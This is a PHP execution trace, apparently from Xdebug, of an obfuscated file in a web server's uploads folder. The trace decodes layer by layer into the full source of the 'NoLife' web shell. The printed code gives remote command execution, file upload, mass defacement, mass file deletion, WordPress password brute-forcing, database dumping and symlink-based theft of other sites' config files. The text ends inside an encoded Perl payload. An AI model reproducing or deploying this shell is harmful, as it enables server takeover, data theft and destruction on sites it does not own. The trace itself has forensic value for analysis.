Version: 3.1.0beta2 File format: 4 TRACE START [2023-02-12 19:49:56.592767] 1 0 1 0.000220 393512 1 3 0 0.000521 431248 {main} 1 /var/www/html/uploads/123.php 0 0 1 A /var/www/html/uploads/123.php 2 $gz = 'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==' 1 A /var/www/html/uploads/123.php 3 $gzinflate = '==QHppbucD9yiPw/OPxh8mOcDTHwgX/OClOpu3KYWvJoS7NLLRqnMGdyDMNzQoHByioviXvGJJb56VsGg+JIqUHbNwaaVQbPy+QNwGV4KOERGywRizu/zdFJ1JE39l8Jiqm+pBybAIH2sc5m00JPjGVcBSaGuEMB4pFpeqVqGheEgXaD/9woBViihcEh7VEsSfjOdwgU1rwb3gCuSPSTgGW6BTsBXrEYzVVF2UaeRLcr/WGwbiVnb+E1qJUmGeR94LZKVxsDEbYSY7rUBRyek4jp3JCWOnJHOBpnK4OA0ojTVbCDmohJeNMANvz6MoLLLgwLjQNa6ZsHSPA8Mgvm0oHeLkxOgPWFS6neLx0Vkf6fAHk992bvz2Ta3rImbwttgQKQlIKHXfR95b/hD2fruyqYlXB43WPZ6M9/illxkM4jlP2YbtlX9xdZ5Qh/1RLPNhjs+ie10TZfetVAN5+w1bqbd0tH+olbljqKE5u+pG9wrO6x7gUzld7Xpk0eKPqy' 2 4 0 0.000623 431248 base64_decode 0 /var/www/html/uploads/123.php 4 1 'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==' 2 4 1 0.000650 431536 2 4 R 'eval%28%26quot%3B%3F%26gt%3B%26quot%3B.gzuncompress%28gzuncompress%28gzinflate%28gzinflate%28gzinflate%28base64_decode%28strrev%28%24gzinflate%29%29%29%29%29%29%29%29%3B' 2 5 0 0.000676 431504 urldecode 0 /var/www/html/uploads/123.php 4 1 'eval%28%26quot%3B%3F%26gt%3B%26quot%3B.gzuncompress%28gzuncompress%28gzinflate%28gzinflate%28gzinflate%28base64_decode%28strrev%28%24gzinflate%29%29%29%29%29%29%29%29%3B' 2 5 1 0.000698 431760 2 5 R 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));' 2 6 0 0.000722 431472 htmlspecialchars_decode 0 /var/www/html/uploads/123.php 4 1 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));' 2 6 1 0.000754 431696 2 6 R 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));' 2 7 0 0.000793 433824 eval 1 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));' /var/www/html/uploads/123.php 4 0 3 8 0 0.000813 433824 strrev 0 /var/www/html/uploads/123.php(4) : eval()'d code 1 1 '==QHppbucD9yiPw/OPxh8mOcDTHwgX/OClOpu3KYWvJoS7NLLRqnMGdyDMNzQoHByioviXvGJJb56VsGg+JIqUHbNwaaVQbPy+QNwGV4KOERGywRizu/zdFJ1JE39l8Jiqm+pBybAIH2sc5m00JPjGVcBSaGuEMB4pFpeqVqGheEgXaD/9woBViihcEh7VEsSfjOdwgU1rwb3gCuSPSTgGW6BTsBXrEYzVVF2UaeRLcr/WGwbiVnb+E1qJUmGeR94LZKVxsDEbYSY7rUBRyek4jp3JCWOnJHOBpnK4OA0ojTVbCDmohJeNMANvz6MoLLLgwLjQNa6ZsHSPA8Mgvm0oHeLkxOgPWFS6neLx0Vkf6fAHk992bvz2Ta3rImbwttgQKQlIKHXfR95b/hD2fruyqYlXB43WPZ6M9/illxkM4jlP2YbtlX9xdZ5Qh/1RLPNhjs+ie10TZfetVAN5+w1bqbd0tH+olbljqKE5u+pG9wrO6x7gUzld7Xpk0eKPqy' 3 8 1 0.000886 470720 3 8 R 'AVFlrpoBTGWzmgFHZbiaeJwBPGXDmnic7X1re9pIsvDnzPPMf+hhfIJ9YnP1JXZiz2AMNjbGDuBrksMjJAEyQlIkYYx3sr/9reqLbggMDjm7e97xbgZJXVVdfauurq6u/viH1bN+/cVRHUczjZbjSra7uvbh119U2zbtlq1apu1qRnc1gx8d1W252kBt6dpAc9m3P/HjQOpqcuvb0HRVp2UPDQTiybKuSjbQdWVJ7qmU9p+aobUAbTXJctHNbnK9dlWthhPhc4sCOMn1TDhpID211CdVHrrINeY2AWIOXWvottrDTke1oQQTAIrmWLo09rIgNP3XX1akodtrWZLjkH2S2GlL+fbu5mY7q27llK336rYsb0vbm9t5pZ15v6MkPpB0mihqRxrq7h48WGY/m8sDGdnUTRtJ/J7JdDqZTAKor3DAliQj55CaLGu66pxLRjKYPHTUlvQgPQGAaw/VYJLcg+pUXUS9apY33iOe1ln9TR1Y7nh1pdUo1a9L9c/J' 3 9 0 0.000947 470688 base64_decode 0 /var/www/html/uploads/123.php(4) : eval()'d code 1 1 'AVFlrpoBTGWzmgFHZbiaeJwBPGXDmnic7X1re9pIsvDnzPPMf+hhfIJ9YnP1JXZiz2AMNjbGDuBrksMjJAEyQlIkYYx3sr/9reqLbggMDjm7e97xbgZJXVVdfauurq6u/viH1bN+/cVRHUczjZbjSra7uvbh119U2zbtlq1apu1qRnc1gx8d1W252kBt6dpAc9m3P/HjQOpqcuvb0HRVp2UPDQTiybKuSjbQdWVJ7qmU9p+aobUAbTXJctHNbnK9dlWthhPhc4sCOMn1TDhpID211CdVHrrINeY2AWIOXWvottrDTke1oQQTAIrmWLo09rIgNP3XX1akodtrWZLjkH2S2GlL+fbu5mY7q27llK336rYsb0vbm9t5pZ15v6MkPpB0mihqRxrq7h48WGY/m8sDGdnUTRtJ/J7JdDqZTAKor3DAliQj55CaLGu66pxLRjKYPHTUlvQgPQGAaw/VYJLcg+pUXUS9apY33iOe1ln9TR1Y7nh1pdUo1a9L9c/J' 3 9 1 0.001091 507584 3 9 R '\001Qe\001Le\001Gex\001t(jG\032\036t(jG\032\036t(jG\032\036t(jG\032\036t(jG\032\036t(jG\032\036t(jG\032\036t(jG\032\036t(jG\032\036t(jG\032\036\r\n\r\n\r\nNoLifeTeam\r\n\r\n\r\n
\r\n
\r\nNoLifev1\r\n
\r\n".$_SERVER[\'REMOTE_ADDR\']."
";\r\n \r\n?>\r\n
\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n
Username :
\r\n
Password :
\r\n\r\n
\r\n
\r\n
\r\n\r\n\r\n\r\nNoLife\r\n\r\n\r\n\r\n-=NoLife=-\r\n
\r\nL4N4N9_4K1R4\r\n
\r\n\r\n".$perm."";\r\n\t} else {\r\n\t\treturn "".$perm."";\r\n\t}\r\n}\r\nfunction r($dir,$perm) {\r\n\tif(!is_readable($dir)) {\r\n\t\treturn "".$perm."";\r\n\t} else {\r\n\t\treturn "".$perm."";\r\n\t}\r\n}\r\nfunction exe($cmd) {\r\n\tif(function_exists(\'system\')) { \t\t\r\n\t\t@ob_start(); \t\t\r\n\t\t@system($cmd); \t\t\r\n\t\t$buff = @ob_get_contents(); \t\t\r\n\t\t@ob_end_clean(); \t\t\r\n\t\treturn $buff; \t\r\n\t} elseif(function_exists(\'exec\')) { \t\t\r\n\t\t@exec($cmd,$results); \t\t\r\n\t\t$buff = ""; \t\t\r\n\t\tforeach($results as $result) { \t\t\t\r\n\t\t\t$buff .= $result; \t\t\r\n\t\t} return $buff; \t\r\n\t} elseif(function_exists(\'passthru\')) { \t\t\r\n\t\t@ob_start(); \t\t\r\n\t\t@passthru($cmd); \t\t\r\n\t\t$buff = @ob_get_contents(); \t\t\r\n\t\t@ob_end_clean(); \t\t\r\n\t\treturn $buff; \t\r\n\t} elseif(function_exists(\'shell_exec\')) { \t\t\r\n\t\t$buff = @shell_exec($cmd); \t\t\r\n\t\treturn $buff; \t\r\n\t} \r\n}\r\nfunction perms($file){\r\n\t$perms = fileperms($file);\r\n\tif (($perms & 0xC000) == 0xC000) {\r\n\t// Socket\r\n\t$info = \'s\';\r\n\t} elseif (($perms & 0xA000) == 0xA000) {\r\n\t// Symbolic Link\r\n\t$info = \'l\';\r\n\t} elseif (($perms & 0x8000) == 0x8000) {\r\n\t// Regular\r\n\t$info = \'-\';\r\n\t} elseif (($perms & 0x6000) == 0x6000) {\r\n\t// Block special\r\n\t$info = \'b\';\r\n\t} elseif (($perms & 0x4000) == 0x4000) {\r\n\t// Directory\r\n\t$info = \'d\';\r\n\t} elseif (($perms & 0x2000) == 0x2000) {\r\n\t// Character special\r\n\t$info = \'c\';\r\n\t} elseif (($perms & 0x1000) == 0x1000) {\r\n\t// FIFO pipe\r\n\t$info = \'p\';\r\n\t} else {\r\n\t// Unknown\r\n\t$info = \'u\';\r\n\t}\r\n\t\t// Owner\r\n\t$info .= (($perms & 0x0100) ? \'r\' : \'-\');\r\n\t$info .= (($perms & 0x0080) ? \'w\' : \'-\');\r\n\t$info .= (($perms & 0x0040) ?\r\n\t(($perms & 0x0800) ? \'s\' : \'x\' ) :\r\n\t(($perms & 0x0800) ? \'S\' : \'-\'));\r\n\t// Group\r\n\t$info .= (($perms & 0x0020) ? \'r\' : \'-\');\r\n\t$info .= (($perms & 0x0010) ? \'w\' : \'-\');\r\n\t$info .= (($perms & 0x0008) ?\r\n\t(($perms & 0x0400) ? \'s\' : \'x\' ) :\r\n\t(($perms & 0x0400) ? \'S\' : \'-\'));\r\n\t// World\r\n\t$info .= (($perms & 0x0004) ? \'r\' : \'-\');\r\n\t$info .= (($perms & 0x0002) ? \'w\' : \'-\');\r\n\t$info .= (($perms & 0x0001) ?\r\n\t(($perms & 0x0200) ? \'t\' : \'x\' ) :\r\n\t(($perms & 0x0200) ? \'T\' : \'-\'));\r\n\treturn $info;\r\n}\r\nfunction hdd($s) {\r\n\tif($s >= 1073741824)\r\n\treturn sprintf(\'%1.2f\',$s / 1073741824 ).\' GB\';\r\n\telseif($s >= 1048576)\r\n\treturn sprintf(\'%1.2f\',$s / 1048576 ) .\' MB\';\r\n\telseif($s >= 1024)\r\n\treturn sprintf(\'%1.2f\',$s / 1024 ) .\' KB\';\r\n\telse\r\n\treturn $s .\' B\';\r\n}\r\nfunction ambilKata($param, $kata1, $kata2){\r\n if(strpos($param, $kata1) === FALSE) return FALSE;\r\n if(strpos($param, $kata2) === FALSE) return FALSE;\r\n $start = strpos($param, $kata1) + strlen($kata1);\r\n $end = strpos($param, $kata2, $start);\r\n $return = substr($param, $start, $end - $start);\r\n return $return;\r\n}\r\nfunction getsource($url) {\r\n $curl = curl_init($url);\r\n \t\tcurl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);\r\n \t\tcurl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);\r\n \t\tcurl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);\r\n \t\tcurl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);\r\n $content = curl_exec($curl);\r\n \t\tcurl_close($curl);\r\n return $content;\r\n}\r\nfunction bing($dork) {\r\n\t$npage = 1;\r\n\t$npages = 30000;\r\n\t$allLinks = array();\r\n\t$lll = array();\r\n\twhile($npage <= $npages) {\r\n\t $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);\r\n\t if($x) {\r\n\t\t\tpreg_match_all(\'#

ON" : "OFF";\r\n$ds = @ini_get("disable_functions");\r\n$mysql = (function_exists(\'mysql_connect\')) ? "ON" : "OFF";\r\n$curl = (function_exists(\'curl_version\')) ? "ON" : "OFF";\r\n$wget = (exe(\'wget --help\')) ? "ON" : "OFF";\r\n$perl = (exe(\'perl --help\')) ? "ON" : "OFF";\r\n$python = (exe(\'python --help\')) ? "ON" : "OFF";\r\n$show_ds = (!empty($ds)) ? "$ds" : "NONE";\r\nif(!function_exists(\'posix_getegid\')) {\r\n\t$user = @get_current_user();\r\n\t$uid = @getmyuid();\r\n\t$gid = @getmygid();\r\n\t$group = "?";\r\n} else {\r\n\t$uid = @posix_getpwuid(posix_geteuid());\r\n\t$gid = @posix_getgrgid(posix_getegid());\r\n\t$user = $uid[\'name\'];\r\n\t$uid = $uid[\'uid\'];\r\n\t$group = $gid[\'name\'];\r\n\t$gid = $gid[\'gid\'];\r\n}\r\necho "System: ".$kernel."
";\r\necho "User: ".$user." (".$uid.") Group: ".$group." (".$gid.")
";\r\necho "Server IP: ".$ip." | Your IP: ".$_SERVER[\'REMOTE_ADDR\']."
";\r\necho "HDD: $used / $total ( Free: $freespace )
";\r\necho "Safe Mode: $sm
";\r\necho "Disable Functions: $show_ds
";\r\necho "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl
";\r\necho "Current DIR: ";\r\nforeach($scdir as $c_dir => $cdir) {\t\r\n\techo "$cdir/";\r\n}\r\necho "  [ ".w($dir, perms($dir))." ]";\r\necho "
";\r\necho "
";\r\necho "";\r\necho "
";\r\necho "
";\r\nif($_GET[\'logout\'] == true) {\r\n\tunset($_SESSION[md5($_SERVER[\'HTTP_HOST\'])]);\r\n\techo "";\r\n\r\n } if($_GET[\'do\'] == \'dump\') {\r\n\t echo "
";\r\n echo $head."

";\r\n echo "";\r\n echo "";\r\n echo "";\r\n\t echo "";\r\n\t echo "";\r\n\t echo "\r\n\t";\r\n\techo "\r\n\t";\r\n\techo "";\r\n\techo "";\r\n\techo "";\r\n\techo "";\r\n\techo "";\r\n\techo "
Database Dump
Server
Username
Password
DataBase Name
DB Type ";\r\n\techo "";\r\n\techo "
";\r\nif ($_POST[\'username\'] && $_POST[\'dbname\'] && $_POST[\'method\']){\r\n$date = date("Y-m-d");\r\n$dbserver = $_POST[\'server\'];\r\n$dbuser = $_POST[\'username\'];\r\n$dbpass = $_POST[\'password\'];\r\n$dbname = $_POST[\'dbname\'];\r\n$file = "Dump-$dbname-$date";\r\n$method = $_POST[\'method\'];\r\nif ($method==\'sql\'){\r\n$file="Dump-$dbname-$date.sql";\r\n$fp=fopen($file,"w");\r\n}else{\r\n$file="Dump-$dbname-$date.sql.gz";\r\n$fp = gzopen($file,"w");\r\n}\r\nfunction write($data) {\r\nglobal $fp;\r\nif ($_POST[\'method\']==\'ssql\'){\r\nfwrite($fp,$data);\r\n}else{\r\ngzwrite($fp, $data);\r\n}}\r\nmysql_connect ($dbserver, $dbuser, $dbpass);\r\nmysql_select_db($dbname);\r\n$tables = mysql_query ("SHOW TABLES");\r\nwhile ($i = mysql_fetch_array($tables)) {\r\n $i = $i[\'Tables_in_\'.$dbname];\r\n $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));\r\n write($create[\'Create Table\'].";\\n\\n");\r\n $sql = mysql_query ("SELECT * FROM ".$i);\r\n if (mysql_num_rows($sql)) {\r\n while ($row = mysql_fetch_row($sql)) {\r\n foreach ($row as $j => $k) {\r\n $row[$j] = "\'".mysql_escape_string($k)."\'";\r\n }\r\n write("INSERT INTO $i VALUES(".implode(",", $row).");\\n");\r\n }\r\n }\r\n}\r\nif ($method==\'ssql\'){\r\nfclose ($fp);\r\n}else{\r\ngzclose($fp);}\r\nheader("Content-Disposition: attachment; filename=" . $file); \r\nheader("Content-Type: application/download");\r\nheader("Content-Length: " . filesize($file));\r\nflush();\r\n\r\n$fp = fopen($file, "r");\r\nwhile (!feof($fp))\r\n{\r\n echo fread($fp, 65536);\r\n flush();\r\n} \r\nfclose($fp); \r\n}\r\n} if($_GET[\'do\'] == \'about\') {\r\n\t echo "


NoLifev1
by
L4N4N9_4K1R4 - NoLife\r\n\t

Kenapa ane namain NoLife?
Soalnya ane nolife :\'(
\r\nDan hasil akhirnya malah tambah bikin nolep, Karena malah makin kacauu. Wkwkwk :v

Thanks to:
All : Mr.DenCraftY ~ Mr-Andraz404 ~ Fx_Fri3nds_ ~ Mr.Oz ~ Mr.Crabs ~ ./Mr.HanzID ~ Peoplehurt1337 ~ Gend3ruw0 ~ ./Mister-Y404 ~ Mr. Hurted ~ ./D14 ~ L4N4N9_4K1R4 ~ ./M~I~R[404] ~ And You";\r\n\t echo "
Recoded From IndoXploit

";\r\n } if($_GET[\'do\'] == \'bypass\') {\r\n\t echo "
";\r\n echo " -=[ Command Bypass Exploit ]=- ";\r\nprint_r(\'\r\n
\r\n\r\nCommand  :=) \r\n\r\n
Menu Bypass  :=)   \r\n\r\n
\r\n\');\r\nini_restore("safe_mode");\r\nini_restore("open_basedir");\r\n$liz0=shell_exec($_POST[baba]); \r\n$liz0zim=shell_exec($_POST[liz0]); \r\n$uid=shell_exec(\'id\');\r\n$server=shell_exec(\'uname -a\');\r\necho "
";\r\n\r\necho $liz0;\r\necho $liz0zim;\r\necho "
";\r\n ""; \r\n\r\n} if($_GET[\'do\'] == \'wp-bf\') {\r\n\t echo "
";\r\n echo "
";\r\n echo "+--=[ Wordpress Brute Force ]=--+
";\r\necho "";\r\n echo "";\r\n echo "";\r\n \r\n echo "";\r\n echo "\r\n \r\n \r\n \r\n ";\r\n echo "\r\n ";\r\n echo "";\r\n echo "";\r\n echo "\r\n ";\r\necho "
\r\n
Wordpress Brute Force
 

Hosts:

Users:

Passwords:

 
";\r\nif($_POST)\r\n{\r\n\t$hosts = trim(filter($_POST[\'hosts\']));\r\n\t$passwords = trim(filter($_POST[\'passwords\']));\r\n\t$usernames = trim(filter($_POST[\'usernames\']));\r\n\r\n\tif($passwords && $usernames && $hosts)\r\n\t{\r\n\t\t$hosts_explode = explode("\\n", $hosts);\r\n\t\t$usernames_explode = explode("\\n", $usernames);\r\n \t$passwords_explode = explode("\\n", $passwords);\r\n\r\n\t\tforeach($hosts_explode as $host)\r\n\t\t{\r\n\t\t\t$host = RemoveLastSlash($host);\r\n\t\t\t$hacked = 0;\r\n\t\t\t$host = str_replace(array("http://","https://","www."),"",trim($host));\r\n\t\t\t$host = "http://".$host;\r\n\t\t\t$wpAdmin = $host.\'/wp-admin/\';\r\n\r\n\t\t\tif(!url_exists($host."/wp-login.php"))\r\n\t\t\t{echo "

".$host." => Error In Login Page !

";ob_flush();flush();continue;}\r\n\r\n\t\t\tforeach($usernames_explode as $username)\r\n\t\t\t{\r\n\t\t\t\tforeach($passwords_explode as $password)\r\n\t\t\t\t{\r\n\t\t\t\t\t$ch = curl_init();\r\n\t\t\t\t\tcurl_setopt($ch,CURLOPT_RETURNTRANSFER,1);\r\n\t\t\t\t\tcurl_setopt($ch,CURLOPT_URL,$host.\'/wp-login.php\');\r\n\t\t\t\t\tcurl_setopt($ch,CURLOPT_COOKIEJAR,"coki.txt");\r\n\t\t\t\t\tcurl_setopt($ch,CURLOPT_COOKIEFILE,"coki.txt");\r\n\t\t\t\t\tcurl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);\r\n\t\t\t\t\tcurl_setopt($ch,CURLOPT_POST,TRUE);\r\n\t\t\t\t\tcurl_setopt($ch,CURLOPT_POSTFIELDS,"log=".$username."&pwd=".$password."&wp-submit=Giri‏"."&redirect_to=".$wpAdmin."&testcookie=1");\r\n\t\t\t\t\t$login =\t curl_exec($ch);\r\n\r\n\t\t\t\t\tif(eregi ("profile.php",$login) )\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t$hacked = 1;\r\n\t\t\t\t\t\techo "

".$host." => UserName : [".$username."] : Password : [".$password."]

";\r\n\t\t\t\t\t\tob_flush();flush();break;\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\tif($hacked == 1){break;}\r\n\t\t\t}\r\n\t\t\tif($hacked == 0)\r\n\t\t\t{echo "

".$host." => Failed !

";ob_flush();flush();}\r\n\t\t}\r\n\t}\r\n\telse {echo "

All fields are Required !

";}\r\n}\r\n?>\r\n
\r\n";\r\n\r\n }\r\n elseif($_GET[\'do\'] == \'upload\') {\r\n\techo "
";\r\n\tif($_POST[\'upload\']) {\r\n\t\tif($_POST[\'tipe_upload\'] == \'biasa\') {\r\n\t\t\tif(@copy($_FILES[\'ix_file\'][\'tmp_name\'], "$dir/".$_FILES[\'ix_file\'][\'name\']."")) {\r\n\t\t\t\t$act = "Uploaded! at $dir/".$_FILES[\'ix_file\'][\'name\']."";\r\n\t\t\t} else {\r\n\t\t\t\t$act = "failed to upload file";\r\n\t\t\t}\r\n\t\t} else {\r\n\t\t\t$root = $_SERVER[\'DOCUMENT_ROOT\']."/".$_FILES[\'ix_file\'][\'name\'];\r\n\t\t\t$web = $_SERVER[\'HTTP_HOST\']."/".$_FILES[\'ix_file\'][\'name\'];\r\n\t\t\tif(is_writable($_SERVER[\'DOCUMENT_ROOT\'])) {\r\n\t\t\t\tif(@copy($_FILES[\'ix_file\'][\'tmp_name\'], $root)) {\r\n\t\t\t\t\t$act = "Uploaded! at $root -> $web";\r\n\t\t\t\t} else {\r\n\t\t\t\t\t$act = "failed to upload file";\r\n\t\t\t\t}\r\n\t\t\t} else {\r\n\t\t\t\t$act = "failed to upload file";\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\techo "Upload File:\r\n\t
\r\n\tBiasa [ ".w($dir,"Writeable")." ] \r\n\thome_root [ ".w($_SERVER[\'DOCUMENT_ROOT\'],"Writeable")." ]
\r\n\t\r\n\t\r\n\t
";\r\n\techo $act;\r\n\techo "
";\r\n} elseif($_GET[\'do\'] == \'cmd\') {\r\n\techo "
\r\n\t".$user."@".$ip.": ~ $ \r\n\t>\'>\r\n\t
";\r\n\tif($_POST[\'do_cmd\']) {\r\n\t\techo "
".exe($_POST[\'cmd\'])."
";\r\n\t}\r\n} elseif($_GET[\'do\'] == \'mass_deface\') {\r\n\tfunction sabun_massal($dir,$namafile,$isi_script) {\r\n\t\tif(is_writable($dir)) {\r\n\t\t\t$dira = scandir($dir);\r\n\t\t\tforeach($dira as $dirb) {\r\n\t\t\t\t$dirc = "$dir/$dirb";\r\n\t\t\t\t$lokasi = $dirc.\'/\'.$namafile;\r\n\t\t\t\tif($dirb === \'.\') {\r\n\t\t\t\t\tfile_put_contents($lokasi, $isi_script);\r\n\t\t\t\t} elseif($dirb === \'..\') {\r\n\t\t\t\t\tfile_put_contents($lokasi, $isi_script);\r\n\t\t\t\t} else {\r\n\t\t\t\t\tif(is_dir($dirc)) {\r\n\t\t\t\t\t\tif(is_writable($dirc)) {\r\n\t\t\t\t\t\t\techo "[DONE] $lokasi
";\r\n\t\t\t\t\t\t\tfile_put_contents($lokasi, $isi_script);\r\n\t\t\t\t\t\t\t$idx = sabun_massal($dirc,$namafile,$isi_script);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tfunction sabun_biasa($dir,$namafile,$isi_script) {\r\n\t\tif(is_writable($dir)) {\r\n\t\t\t$dira = scandir($dir);\r\n\t\t\tforeach($dira as $dirb) {\r\n\t\t\t\t$dirc = "$dir/$dirb";\r\n\t\t\t\t$lokasi = $dirc.\'/\'.$namafile;\r\n\t\t\t\tif($dirb === \'.\') {\r\n\t\t\t\t\tfile_put_contents($lokasi, $isi_script);\r\n\t\t\t\t} elseif($dirb === \'..\') {\r\n\t\t\t\t\tfile_put_contents($lokasi, $isi_script);\r\n\t\t\t\t} else {\r\n\t\t\t\t\tif(is_dir($dirc)) {\r\n\t\t\t\t\t\tif(is_writable($dirc)) {\r\n\t\t\t\t\t\t\techo "[DONE] $dirb/$namafile
";\r\n\t\t\t\t\t\t\tfile_put_contents($lokasi, $isi_script);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tif($_POST[\'start\']) {\r\n\t\tif($_POST[\'tipe_sabun\'] == \'mahal\') {\r\n\t\t\techo "
";\r\n\t\t\tsabun_massal($_POST[\'d_dir\'], $_POST[\'d_file\'], $_POST[\'script\']);\r\n\t\t\techo "
";\r\n\t\t} elseif($_POST[\'tipe_sabun\'] == \'murah\') {\r\n\t\t\techo "
";\r\n\t\t\tsabun_biasa($_POST[\'d_dir\'], $_POST[\'d_file\'], $_POST[\'script\']);\r\n\t\t\techo "
";\r\n\t\t}\r\n\t} else {\r\n\techo "
";\r\n\techo "
\r\n\tTipe Sabun:
\r\n\tBiasaMassal
\r\n\tFolder:
\r\n\t
\r\n\tFilename:
\r\n\t
\r\n\tIndex File:
\r\n\t
\r\n\t\r\n\t
";\r\n\t}\r\n} elseif($_GET[\'do\'] == \'mass_delete\') {\r\n\tfunction hapus_massal($dir,$namafile) {\r\n\t\tif(is_writable($dir)) {\r\n\t\t\t$dira = scandir($dir);\r\n\t\t\tforeach($dira as $dirb) {\r\n\t\t\t\t$dirc = "$dir/$dirb";\r\n\t\t\t\t$lokasi = $dirc.\'/\'.$namafile;\r\n\t\t\t\tif($dirb === \'.\') {\r\n\t\t\t\t\tif(file_exists("$dir/$namafile")) {\r\n\t\t\t\t\t\tunlink("$dir/$namafile");\r\n\t\t\t\t\t}\r\n\t\t\t\t} elseif($dirb === \'..\') {\r\n\t\t\t\t\tif(file_exists("".dirname($dir)."/$namafile")) {\r\n\t\t\t\t\t\tunlink("".dirname($dir)."/$namafile");\r\n\t\t\t\t\t}\r\n\t\t\t\t} else {\r\n\t\t\t\t\tif(is_dir($dirc)) {\r\n\t\t\t\t\t\tif(is_writable($dirc)) {\r\n\t\t\t\t\t\t\tif(file_exists($lokasi)) {\r\n\t\t\t\t\t\t\t\techo "[DELETED] $lokasi
";\r\n\t\t\t\t\t\t\t\tunlink($lokasi);\r\n\t\t\t\t\t\t\t\t$idx = hapus_massal($dirc,$namafile);\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tif($_POST[\'start\']) {\r\n\t\techo "
";\r\n\t\thapus_massal($_POST[\'d_dir\'], $_POST[\'d_file\']);\r\n\t\techo "
";\r\n\t} else {\r\n\techo "
";\r\n\techo "
\r\n\tFolder:
\r\n\t
\r\n\tFilename:
\r\n\t
\r\n\t\r\n\t
";\r\n\t}\r\n} elseif($_GET[\'do\'] == \'config\') {\r\n\t$idx = mkdir("idx_config", 0777);\r\n\t$isi_htc = "Options FollowSymLinks MultiViews Indexes ExecCGI\\nRequire None\\nSatisfy Any\\nAddType application/x-httpd-cgi .cin\\nAddHandler cgi-script .cin\\nAddHandler cgi-script .cin";\r\n\t$htc = fopen("idx_config/.htaccess","w");\r\n\tfwrite($htc, $isi_htc);\r\n\tfclose($htc);\r\n\tif(preg_match("/vhosts|vhost/", $dir)) {\r\n\t\t$link_config = str_replace($_SERVER[\'DOCUMENT_ROOT\'], "", $dir);\r\n\t\t$vhost = "IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpvcGVuZGlyKG15ICRkaXIgLCAiL3Zhci93d3cvdmhvc3RzLyIpOw0KZm9yZWFjaChzb3J0IHJlYWRkaXIgJGRpcikgew0KICAgIG15ICRpc0RpciA9IDA7DQogICAgJGlzRGlyID0gMSBpZiAtZCAkXzsNCiRzaXRlc3MgPSAkXzsNCg0KDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3Atb3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb20vaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tbWVyY2UvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2UudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2VzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3BwaW5nL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NhbGUvaW5jbHVkZXMvY29uZmln